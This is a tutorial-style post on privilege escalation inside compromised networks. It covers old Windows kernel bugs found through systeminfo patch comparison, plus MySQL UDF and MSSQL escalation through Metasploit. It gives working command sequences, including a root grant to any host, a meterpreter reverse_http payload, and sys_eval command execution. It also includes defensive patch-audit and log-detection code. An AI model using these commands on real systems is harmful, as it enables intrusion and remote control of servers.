On privilege escalation in intranet penetration

Recently a younger colleague asked me: "interviewers always ask about privilege escalation, and it always stumps me." Well, "the interview asks you to build an aircraft carrier, the job has you tightening screws" applies everywhere, so today I'll just write up privilege escalation as I understand it.
First of all, privilege escalation is mostly used in intranet penetration. The intranet penetration meant here is of course not a penetration test that you happen to run from inside an internal network; it is the special scenarios of attack-defense exercises, HW network-protection drills and operations against overseas targets, where you break in from the internet and run into privilege escalation problems during post-exploitation inside the intranet. (Experts, go easy on me; I really can't think of anywhere else escalation is done, since a normal security assessment never needs this skill at all; the traditional craft stops once the point is proven.)

What is privilege escalation

During the penetration of a website it means exploiting vulnerabilities in the website or in the server's operating system to raise the current privilege level, so that we end up with the highest privilege on the server.

Two ways to escalate privileges

System vulnerability privilege escalation

MS08-025 (KB951537)
MS09-012 (KB952004)
MS10-048 (KB2160329)
Linux Kernel <= 2.6.37 Local Privilege Escalation

Case: MS09-012 system privilege escalation (pr.exe, KB952004)
Windows Tracking Registry ACL Privilege Escalation Vulnerability


MS09-012: Churrasco ("barbecue", KB956572)
Windows Tracking Registry ACL Privilege Escalation Vulnerability


MS08-025 (KB951537)
Windows Kernel-level Privilege Escalation Vulnerability

Linux Kernel <= 2.6.37 Local Privilege Escalation

There are far too many privilege escalation cases to cover, so here we take Windows Server privilege escalation as the example. With so many escalation executables around, how are they actually used in a real scenario?

Press WIN+R, open a command prompt and run the systeminfo command. It prints the system information, including which patches have been applied. Then open the online lookup site http://blog.neargle.com/win-powerup-exp-index/ and paste the patch information in; it tells you which privilege escalation vulnerabilities remain usable, with detailed information on the matching escalation executable.


Someone else asked me: this is too much trouble, is there a way to write the systeminfo output to a file and then use an automated tool to identify the vulnerabilities locally?
Here I'll only cover how to redirect the command's output into a txt file; it's actually very simple

systeminfo > 目录/文件名

Example: (screenshots of the redirected output in the original post)

There isn't much more to say about system-level privilege escalation; for people who do it by hand it's a different story. The drawbacks of this approach are also obvious: these escalation executables inevitably get caught, and if the target has a firewall and anti-virus software you're out of luck. This is for learning only; don't do anything stupid, and if you do, leave me out of it.
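The same patch comparison, seen from the defender's side as a patch-compliance check: the added example below (not code from the original post) reads a saved `systeminfo > file.txt` dump, extracts the installed hotfixes, and reports which of the bulletins listed above are still missing a KB. The KB numbers are the ones given on the page; the sample dump is constructed.

```python
import re

# Added example (not from the original post): audit a saved "systeminfo > file.txt" dump
# against the bulletins this page lists. KB numbers are the ones given on the page; a real
# compliance check needs the full catalogue and must allow for superseding updates, so a KB
# being absent here does not by itself prove the host is exposed.
BULLETIN_KBS = {
    "MS08-025": {"KB951537"},
    "MS09-012": {"KB952004", "KB956572"},
    "MS10-048": {"KB2160329"},
}

KB_RE = re.compile(r"\bKB(\d{6,7})\b")
OS_RE = re.compile(r"^OS (?:Name|Version):\s*(.+)$", re.M)

def installed_hotfixes(systeminfo_text):
    """Set of KB ids from the Hotfix(s) section; the "[nn]: KBnnnnnn" lines are locale-independent."""
    return {"KB" + num for num in KB_RE.findall(systeminfo_text)}

def missing_patches(systeminfo_text, catalogue=BULLETIN_KBS):
    """Map each bulletin to the KBs it needs that the dump does not list; fully patched ones are omitted."""
    have = installed_hotfixes(systeminfo_text)
    return {bulletin: sorted(kbs - have) for bulletin, kbs in catalogue.items() if kbs - have}

def audit_report(systeminfo_text):
    """Human-readable summary: the OS lines, then one line per bulletin still missing a KB."""
    lines = ["OS: " + " / ".join(OS_RE.findall(systeminfo_text))]
    for bulletin, kbs in sorted(missing_patches(systeminfo_text).items()):
        lines.append(f"{bulletin}: missing {', '.join(kbs)}")
    return "\n".join(lines)

# Constructed sample dump in the English-locale layout (not a real host).
SAMPLE_SYSTEMINFO = """\
Host Name:                 WIN-TEST01
OS Name:                   Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version:                5.2.3790 Service Pack 2 Build 3790
Hotfix(s):                 3 Hotfix(s) Installed.
                           [01]: KB951537
                           [02]: KB952004
                           [03]: KB976932
Network Card(s):           1 NIC(s) Installed.
"""

if __name__ == "__main__":
    print(audit_report(SAMPLE_SYSTEMINFO))
```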

Third-party software privilege escalation

Serv-U
VNC
SQL Server
……
What does third-party software mean here? Some tools automatically create an account with administrator privileges when they are installed, and that mechanism can be used to perform a privilege escalation.

Serv-U (Port 43958)


VNC privilege escalation


SQL Server SA


PcAnyWhere


Obviously, though, some of these no longer fit the current environment, and the technology has moved on. So here are examples I have actually encountered: the well-known MySQL UDF privilege escalation and MSSQL privilege escalation.

MySQL UDF privilege escalation

Principle:
The exploit/multi/mysql/mysql_udf_payload module in MSF can also be used for UDF privilege escalation. MSF writes a dll file into the lib\plugin\ directory (the precondition is that the directory exists; if it does not, the exploit cannot succeed) under a randomly generated file name. The dll contains two functions, sys_exec() and sys_eval(), but only sys_exec() is created by default, and it produces no echo when executed. We can create the sys_eval() function manually to execute commands with echo.

Prerequisites:
1. The user has permission to log in remotely
2. The user name and password are known

If the user does not have remote login permission, then of course you find a way to log in to the database and create one manually

1. Log in to the target machine and create a remote-access user. Enter the following SQL statement to create the remote-connection user, as shown in Figure 1:
grant all privileges on *.* to 'root'@'%' identified by '123456' with grant option;

2. In Kali, open msfconsole and enter search mysql_udf_payload, as shown in Figure 2

3. Enter use exploit/multi/mysql/mysql_udf_payload to select the module, as shown in Figure 3

4. Enter show payloads to list the available payloads, as shown in Figure 4

5. Set the payload: set payload windows/meterpreter/reverse_http, as shown in Figure 5

6. Set the database user name, password, IP address and listening port: set rhosts; set username; set password; set lport, as shown in Figure 6

7. Enter exploit

A small verification experiment
Log in to the account with the Navicat graphical tool and execute the commands:
select sys_exec('whoami'); -- runs the system command; msf creates sys_exec by default, it has no echo, and it returns 0 on success

create function sys_eval returns string soname 'wsODEVzX.dll'; -- manually create the function that has echo; the .dll file name is randomly generated and can be read directly in Kali
select sys_eval('whoami'); then execute it once, as shown in Figure 9

MSSQL privilege escalation

With the known sa (default) user and the password rising00.00!123, to perform MSSQL privilege
escalation open msfconsole and enter the following commands

search mssql
use auxiliary/admin/mssql/mssql_exec
set rhosts 10.10.59.247
set password rising00.00!123
set cmd whoami
show options
exploit
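Both database scenarios above leave distinctive statements behind: the MySQL steps show up in the general query log (it is off by default and must be enabled with general_log=ON), and the mssql_exec module runs its command through xp_cmdshell, which a SQL Server audit or trace records. The added example below (not code from the original post) flags those statements with simple rules and attributes each MySQL hit to the connecting account; the rule patterns and the sample log lines are this example's own constructed assumptions.

```python
import re
# Added detection example (not from the original post): rules for the statements the MySQL UDF
# and MSSQL steps leave behind. Patterns and sample lines are constructed assumptions, not vendor
# signatures; tune the account and host checks to your own environment.
RULES = [
    ("mysql-global-grant-any-host", re.compile(r"\bGRANT\s+ALL\s+PRIVILEGES\s+ON\s+\*\.\*\s+TO\s+'[^']*'@'%'", re.I)),
    ("mysql-udf-create", re.compile(r"\bCREATE\s+(?:AGGREGATE\s+)?FUNCTION\s+\w+\s+RETURNS\s+\w+\s+SONAME\b", re.I)),
    ("mysql-udf-call", re.compile(r"\bsys_(?:exec|eval)\s*\(", re.I)),
    ("mssql-xp_cmdshell-enable", re.compile(r"\bsp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.I)),
    ("mssql-xp_cmdshell-call", re.compile(r"\bxp_cmdshell\b", re.I)),
]
# One MySQL general query log entry: "<timestamp>\t<thread id> <command>\t<argument>".
GENERAL_LOG_RE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s+(.*)$")

def classify(statement):
    """Return the name of the first rule that matches one SQL statement, or None."""
    for name, pattern in RULES:
        if pattern.search(statement):
            return name
    return None

def scan_mysql_general_log(lines):
    """Return (rule, account, statement) for suspicious Query entries; the account comes from the thread's Connect entry."""
    accounts, hits = {}, []
    for line in lines:
        m = GENERAL_LOG_RE.match(line.rstrip("\n"))
        if not m:
            continue
        _ts, thread, command, argument = m.groups()
        if command == "Connect":  # argument looks like "user@host on <db> using <protocol>"
            accounts[thread] = argument.split(" on ")[0]
        elif command == "Query" and (rule := classify(argument)):
            hits.append((rule, accounts.get(thread, "?"), argument))
    return hits

# Constructed sample general log (not a real capture); the dll name is the one shown in the post.
SAMPLE_MYSQL_GENERAL_LOG = [
    "2021-03-01T09:00:01.000000Z\t   12 Connect\troot@10.10.59.5 on  using TCP/IP",
    "2021-03-01T09:00:05.000000Z\t   12 Query\tgrant all privileges on *.* to 'root'@'%' identified by '123456' with grant option",
    "2021-03-01T09:01:11.000000Z\t   12 Query\tcreate function sys_eval returns string soname 'wsODEVzX.dll'",
    "2021-03-01T09:01:12.000000Z\t   12 Query\tselect sys_eval('whoami')",
    "2021-03-01T09:02:00.000000Z\t   14 Connect\tapp@10.10.59.20 on shop using TCP/IP",
    "2021-03-01T09:02:01.000000Z\t   14 Query\tselect id, name from users where id = 7",
]

# Constructed SQL Server statements as an audit or trace would record them.
SAMPLE_MSSQL_STATEMENTS = [
    "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;",
    "EXEC master..xp_cmdshell 'whoami'",
    "SELECT name FROM sys.databases",
]
```

A hit on mysql-udf-create from an account connecting over the network, as in the sample, is the point at which the plugin directory should be inspected and the account's FILE and global privileges reviewed.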

I don't run into many scenarios that call for privilege escalation; in general it is system privilege escalation that gets used. In practice, the conditions for escalating through third-party database components are very demanding.